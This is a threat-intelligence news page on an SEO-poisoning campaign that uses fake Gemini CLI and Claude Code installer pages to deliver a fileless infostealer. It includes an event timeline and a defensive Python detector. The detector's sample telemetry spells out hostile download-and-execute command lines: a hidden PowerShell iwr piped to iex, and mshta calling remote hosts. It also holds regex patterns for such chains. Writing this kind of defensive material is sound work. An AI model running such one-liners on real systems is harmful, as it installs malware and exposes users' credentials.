SEO-Poisoned Gemini CLI and Claude Code Installers Deliver Fileless Infostealer
Attackers are running an SEO-poisoning campaign that impersonates Gemini CLI and Anthropic Claude Code installation pages to infect Windows developer workstations with a fileless infostealer. The fake sites closely mimic legitimate setup instructions and trick victims into pasting a PowerShell one-liner that installs the real tool while silently executing malicious code in memory. EclecticIQ said the activity was first observed in early March 2026 and linked the Gemini and Claude lures to the same financially motivated actor through shared malware, infrastructure patterns, and social-engineering themes.
The malware disables ETW logging and bypasses AMSI, then steals credentials, session cookies, OAuth tokens, CI/CD secrets, VPN details, SSH material, and files from enterprise and collaboration platforms. It also fingerprints hosts, enumerates processes, dumps Windows Credential Manager data, and can receive follow-on remote code execution tasks from command-and-control servers, raising the risk of broader enterprise and software supply-chain compromise from a single infected developer endpoint. Researchers identified more than 30 related malicious domains and a wider impersonation cluster spoofing Node.js, Chocolatey, KeePassXC, and Monero, including infrastructure tied to IP 109.107.170.111 hosted by MIRhosting and domains tailored to U.S. and U.K. victims.

How this story unfolded
7 events from the most recent confirmed update back to the earliest known activity.
ClickFix campaign expands to fake OpenAI Codex and Google Sites lures
Researchers identified an active ClickFix campaign using fake installer pages on Google Sites to impersonate Claude Code and OpenAI Codex. Victims are tricked into running an mshta command that launches a multi-stage PowerShell chain, extracts steganographically hidden shellcode from an image, and executes credential-stealing malware entirely in memory.
Cyderes discloses Claude Code ClickFix infostealer campaign
Cyderes Howler Cell disclosed a malicious campaign impersonating the Claude Code installation process, using SEO poisoning and ClickFix-style prompts to trick victims into running an MSHTA command. The attack retrieves an MP3/HTA polyglot and launches a mostly fileless .NET infostealer chain that steals browser credentials and communicates with a Russia-based C2 domain.
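As an added example (not code from EclecticIQ, Cyderes or any of the page's sources), a small Python detector for the execution chain described in the two entries above and in the campaign summary: a pasted mshta or PowerShell one-liner whose next stage pulls code down and runs it in memory. It runs over constructed Sysmon-style process-creation records; the field names, regexes, parent-process list and sample command lines are assumptions for illustration, not indicators from the reports.

```python
import re

# Tokens of a pasted "installer" one-liner as the page describes it: a web download fed
# into Invoke-Expression, a hidden/encoded PowerShell, or mshta pointed at a remote URL.
CRADLE = re.compile(r"invoke-webrequest|\biwr\b|downloadstring|net\.webclient", re.I)
IEX = re.compile(r"\biex\b|invoke-expression", re.I)
HIDDEN = re.compile(r"-w(indowstyle)?\s+hidden|-e(c|nc|ncodedcommand)?\s+\S", re.I)
REMOTE_HTA = re.compile(r"mshta(\.exe)?\s+[\"']?https?://", re.I)
# Parents that mean a human pasted the command (Run dialog or a shell); assumed list.
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "windowsterminal.exe"}

def _basename(path):
    return path.lower().rsplit("\\", 1)[-1]

def classify(event):
    """Return reason strings for one Sysmon-style process-creation record ([] = benign)."""
    image, parent = _basename(event["image"]), _basename(event["parent_image"])
    cmd = event["command_line"]
    reasons = []
    if image == "mshta.exe" and REMOTE_HTA.search(cmd):
        reasons.append("mshta launched with remote URL")
    if image in {"powershell.exe", "pwsh.exe"}:
        if CRADLE.search(cmd) and IEX.search(cmd):
            reasons.append("download cradle fed to Invoke-Expression")
        if HIDDEN.search(cmd) and parent in INTERACTIVE_PARENTS:
            reasons.append("hidden/encoded PowerShell pasted from an interactive parent")
        if parent == "mshta.exe":
            reasons.append("PowerShell spawned by mshta")
    return reasons

def scan(events):
    """Return (index, reasons) for every record that matches at least one rule."""
    return [(i, r) for i, e in enumerate(events) if (r := classify(e))]

# Constructed sample telemetry (not real IoCs): a legitimate install, the two-stage
# mshta chain, and a pasted PowerShell one-liner with a download cradle.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell.exe -NoProfile -Command npm install -g some-cli"},
    {"image": r"C:\Windows\System32\mshta.exe", "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "mshta.exe https://installer.example.invalid/setup.hta"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\mshta.exe",
     "command_line": "powershell.exe -w hidden -c \"iwr https://cdn.example.invalid/s | iex\""},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell -w hidden -c \"iex (iwr https://get.example.invalid/i.ps1)\""},
]
```

The legitimate install from a terminal (first record) produces no reasons, while each stage of the pasted chain is flagged on its own, so a single matching record is enough to start triage of the developer workstation.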
Media coverage highlights active developer-focused SEO poisoning campaign
Cyber Security News reported on EclecticIQ's findings, describing the active campaign's use of fake installer pages, fileless PowerShell malware, and theft of credentials, OAuth tokens, CI/CD secrets, VPN details, and session cookies. The coverage emphasized the risk that a single compromised developer workstation could enable broader enterprise compromise.
Researcher first spots Gemini and Claude SEO-poisoning campaign
Independent researcher @g0njxa first identified the malicious SEO-poisoning activity targeting developers searching for Gemini CLI and Claude Code installers. This public sighting preceded EclecticIQ's fuller analysis that later linked the fake software sites to a single financially motivated actor.
Campaign infrastructure expands to broader software impersonation domains
As the campaign developed, the same actor expanded beyond Gemini and Claude lures to impersonate Node.js, Chocolatey, KeePassXC, and Monero. Researchers identified more than 30 related malicious domains and linked infrastructure hosted on IP 109.107.170.111, with some domains tailored to U.S. and U.K. victims.
SEO-poisoning infostealer campaign first observed targeting AI developer tools
In early March 2026, a financially motivated campaign was first observed using SEO-poisoned fake sites impersonating Gemini CLI and Anthropic Claude Code. Victims were tricked into running PowerShell one-liners that installed the legitimate tool while executing a fileless infostealer in memory on Windows systems.
EclecticIQ links Gemini and Claude lures to one threat actor
EclecticIQ assessed that the Gemini CLI and Claude Code fake installer activity was conducted by the same actor based on shared malware, infrastructure patterns, and social-engineering themes. The report also documented the malware's credential theft, ETW and AMSI evasion, and remote code execution capability.
Sources
8 references tracked.
Hackers Use Fake Claude Code Install Page to Deliver Fileless .NET Infostealer (cybersecuritynews.com)
Fake Claude Code Installer Via Google Sites Deliver Credential-Stealing Malware (cybersecuritynews.com)
Fake Anthropic Sites Deliver Fileless Infostealer to Claude Code Users (hackread.com)
‘Claude Code install’ search result leads to ClickFix infostealer attack | news | SC Media (scworld.com)
Fake AI tool websites used to steal developer data | brief | SC Media (scworld.com)
Trojanized Gemini and Claude Installers Target Developers Via SEO Poisoning (hackread.com)
Hackers Use SEO Poisoning to Impersonate Gemini CLI and Claude Code Installers (cybersecuritynews.com)
SEO poisoning campaign leverages Gemini and Claude Code impersonation to deliver infostealer (blog.eclecticiq.com)